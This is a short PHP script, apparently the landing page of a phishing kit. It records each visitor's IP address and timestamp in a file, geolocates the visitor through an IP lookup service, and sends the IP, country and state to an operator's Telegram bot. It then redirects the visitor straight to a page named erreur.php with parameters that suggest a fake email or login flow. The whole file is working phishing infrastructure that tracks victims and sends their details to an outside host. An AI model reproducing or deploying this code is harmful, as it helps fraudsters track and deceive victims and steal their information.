<?php



include "config.php";


$ip = getenv("REMOTE_ADDR");


$file = fopen("vu.txt","a");


fwrite($file,$ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");

$IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/".$ip));
$COUNTRY = $IP_LOOKUP->country . "\r\n";
$STATE   = $IP_LOOKUP->regionName . "\r\n";

$msg=$ip."\nCountry : ".$COUNTRY."State: " .$STATE;

file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatids."&text=" . urlencode($msg)."" );



error_reporting(0);

?>

<meta http-equiv="refresh"
   content="0; url=./espace/erreur.php?country.x=Global&one=ok&flowId=ul&_Email=data">
</body></html>